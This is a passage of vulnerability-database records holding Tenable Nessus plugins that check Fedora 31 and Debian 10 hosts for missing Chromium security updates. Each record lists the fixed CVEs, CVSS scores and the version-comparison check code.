script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"79.0.3945.130-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:08:18", "description": "Update to 80.0.3987.132. Lots of security fixes here. VAAPI re-enabled by default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-20T00:00:00", "type": "nessus", "title": "Fedora 31 : chromium (2020-f6271d7afa)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20446", "CVE-2020-10531", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6417", "CVE-2020-6418", "CVE-2020-6420"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2020-F6271D7AFA.NASL", "href": "https://www.tenable.com/plugins/nessus/134718", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-f6271d7afa.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134718);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-20446\", \"CVE-2020-10531\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6383\", \"CVE-2020-6384\", \"CVE-2020-6385\", \"CVE-2020-6386\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6405\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6417\", \"CVE-2020-6418\", \"CVE-2020-6420\");\n script_xref(name:\"FEDORA\", value:\"2020-f6271d7afa\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Fedora 31 : chromium (2020-f6271d7afa)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 80.0.3987.132. Lots of security fixes here. VAAPI re-enabled\nby default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-f6271d7afa\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"chromium-80.0.3987.132-1.fc31\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:08:19", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2019-19880 Richard Lorenz discovered an issue in the sqlite library.\n\n - CVE-2019-19923 Richard Lorenz discovered an out-of-bounds read issue in the sqlite library.\n\n - CVE-2019-19925 Richard Lorenz discovered an issue in the sqlite library.\n\n - CVE-2019-19926 Richard Lorenz discovered an implementation error in the sqlite library.\n\n - CVE-2020-6381 UK's National Cyber Security Centre discovered an integer overflow issue in the v8 JavaScript library.\n\n - CVE-2020-6382 Soyeon Park and Wen Xu discovered a type error in the v8 JavaScript library.\n\n - CVE-2020-6383 Sergei Glazunov discovered a type error in the v8 JavaScript library.\n\n - CVE-2020-6384 David Manoucheri discovered a use-after-free issue in WebAudio.\n\n - CVE-2020-6385 Sergei Glazunov discovered a policy enforcement error.\n\n - CVE-2020-6386 Zhe Jin discovered a use-after-free issue in speech processing.\n\n - CVE-2020-6387 Natalie Silvanovich discovered an out-of-bounds write error in the WebRTC implementation.\n\n - CVE-2020-6388 Sergei Glazunov discovered an out-of-bounds read error in the WebRTC implementation.\n\n - CVE-2020-6389 Natalie Silvanovich discovered an out-of-bounds write error in the WebRTC implementation.\n\n - CVE-2020-6390 Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6391 Michal Bentkowski discoverd that untrusted input was insufficiently validated.\n\n - CVE-2020-6392 The Microsoft Edge Team discovered a policy enforcement error.\n\n - CVE-2020-6393 Mark Amery discovered a policy enforcement error.\n\n - CVE-2020-6394 Phil Freo discovered a policy enforcement error.\n\n - CVE-2020-6395 Pierre Langlois discovered an out-of-bounds read error in the v8 JavaScript library.\n\n - CVE-2020-6396 William Luc Ritchie discovered an error in the skia library.\n\n - CVE-2020-6397 Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6398 pdknsk discovered an uninitialized variable in the pdfium library.\n\n - CVE-2020-6399 Luan Herrera discovered a policy enforcement error.\n\n - CVE-2020-6400 Takashi Yoneuchi discovered an error in Cross-Origin Resource Sharing.\n\n - CVE-2020-6401 Tzachy Horesh discovered that user input was insufficiently validated.\n\n - CVE-2020-6402 Vladimir Metnew discovered a policy enforcement error.\n\n - CVE-2020-6403 Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6404 kanchi discovered an error in Blink/Webkit.\n\n - CVE-2020-6405 Yongheng Chen and Rui Zhong discovered an out-of-bounds read issue in the sqlite library.\n\n - CVE-2020-6406 Sergei Glazunov discovered a use-after-free issue.\n\n - CVE-2020-6407 Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6408 Zhong Zhaochen discovered a policy enforcement error in Cross-Origin Resource Sharing.\n\n - CVE-2020-6409 Divagar S and Bharathi V discovered an error in the omnibox implementation.\n\n - CVE-2020-6410 evil1m0 discovered a policy enforcement error.\n\n - CVE-2020-6411 Khalil Zhani discovered that user input was insufficiently validated.\n\n - CVE-2020-6412 Zihan Zheng discovered that user input was insufficiently validated.\n\n - CVE-2020-6413 Michal Bentkowski discovered an error in Blink/Webkit.\n\n - CVE-2020-6414 Lijo A.T discovered a policy safe browsing policy enforcement error.\n\n - CVE-2020-6415 Avihay Cohen discovered an implementation error in the v8 JavaScript library.\n\n - CVE-2020-6416 Woojin Oh discovered that untrusted input was insufficiently validated.\n\n - CVE-2020-6418 Clement Lecigne discovered a type error in the v8 JavaScript library.\n\n - CVE-2020-6420 Taras Uzdenov discovered a policy enforcement error.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-12T00:00:00", "type": "nessus", "title": "Debian DSA-4638-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19880", "CVE-2019-19923", "CVE-2019-19925", "CVE-2019-19926", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6418", "CVE-2020-6420"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4638.NASL", "href": "https://www.tenable.com/plugins/nessus/134433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4638. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134433);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2019-19880\", \"CVE-2019-19923\", \"CVE-2019-19925\", \"CVE-2019-19926\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6383\", \"CVE-2020-6384\", \"CVE-2020-6385\", \"CVE-2020-6386\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6405\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6418\", \"CVE-2020-6420\");\n script_xref(name:\"DSA\", value:\"4638\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Debian DSA-4638-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2019-19880\n Richard Lorenz discovered an issue in the sqlite\n library.\n\n - CVE-2019-19923\n Richard Lorenz discovered an out-of-bounds read issue in\n the sqlite library.\n\n - CVE-2019-19925\n Richard Lorenz discovered an issue in the sqlite\n library.\n\n - CVE-2019-19926\n Richard Lorenz discovered an implementation error in the\n sqlite library.\n\n - CVE-2020-6381\n UK's National Cyber Security Centre discovered an\n integer overflow issue in the v8 JavaScript library.\n\n - CVE-2020-6382\n Soyeon Park and Wen Xu discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6383\n Sergei Glazunov discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6384\n David Manoucheri discovered a use-after-free issue in\n WebAudio.\n\n - CVE-2020-6385\n Sergei Glazunov discovered a policy enforcement error.\n\n - CVE-2020-6386\n Zhe Jin discovered a use-after-free issue in speech\n processing.\n\n - CVE-2020-6387\n Natalie Silvanovich discovered an out-of-bounds write\n error in the WebRTC implementation.\n\n - CVE-2020-6388\n Sergei Glazunov discovered an out-of-bounds read error\n in the WebRTC implementation.\n\n - CVE-2020-6389\n Natalie Silvanovich discovered an out-of-bounds write\n error in the WebRTC implementation.\n\n - CVE-2020-6390\n Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6391\n Michal Bentkowski discoverd that untrusted input was\n insufficiently validated.\n\n - CVE-2020-6392\n The Microsoft Edge Team discovered a policy enforcement\n error.\n\n - CVE-2020-6393\n Mark Amery discovered a policy enforcement error.\n\n - CVE-2020-6394\n Phil Freo discovered a policy enforcement error.\n\n - CVE-2020-6395\n Pierre Langlois discovered an out-of-bounds read error\n in the v8 JavaScript library.\n\n - CVE-2020-6396\n William Luc Ritchie discovered an error in the skia\n library.\n\n - CVE-2020-6397\n Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6398\n pdknsk discovered an uninitialized variable in the\n pdfium library.\n\n - CVE-2020-6399\n Luan Herrera discovered a policy enforcement error.\n\n - CVE-2020-6400\n Takashi Yoneuchi discovered an error in Cross-Origin\n Resource Sharing.\n\n - CVE-2020-6401\n Tzachy Horesh discovered that user input was\n insufficiently validated.\n\n - CVE-2020-6402\n Vladimir Metnew discovered a policy enforcement error.\n\n - CVE-2020-6403\n Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6404\n kanchi discovered an error in Blink/Webkit.\n\n - CVE-2020-6405\n Yongheng Chen and Rui Zhong discovered an out-of-bounds\n read issue in the sqlite library.\n\n - CVE-2020-6406\n Sergei Glazunov discovered a use-after-free issue.\n\n - CVE-2020-6407\n Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6408\n Zhong Zhaochen discovered a policy enforcement error in\n Cross-Origin Resource Sharing.\n\n - CVE-2020-6409\n Divagar S and Bharathi V discovered an error in the\n omnibox implementation.\n\n - CVE-2020-6410\n evil1m0 discovered a policy enforcement error.\n\n - CVE-2020-6411\n Khalil Zhani discovered that user input was\n insufficiently validated.\n\n - CVE-2020-6412\n Zihan Zheng discovered that user input was\n insufficiently validated.\n\n - CVE-2020-6413\n Michal Bentkowski discovered an error in Blink/Webkit.\n\n - CVE-2020-6414\n Lijo A.T discovered a policy safe browsing policy\n enforcement error.\n\n - CVE-2020-6415\n Avihay Cohen discovered an implementation error in the\n v8 JavaScript library.\n\n - CVE-2020-6416\n Woojin Oh discovered that untrusted input was\n insufficiently validated.\n\n - CVE-2020-6418\n Clement Lecigne discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6420\n Taras Uzdenov discovered a policy enforcement error.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19880\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19923\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6381\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6383\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6384\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6385\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6387\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6394\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6403\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6407\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6409\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6411\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6414\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6415\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6416\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4638\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the oldstable distribution (stretch), security support for\nchromium has been discontinued.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 80.0.3987.132-1~deb10u1.\"\n );\n 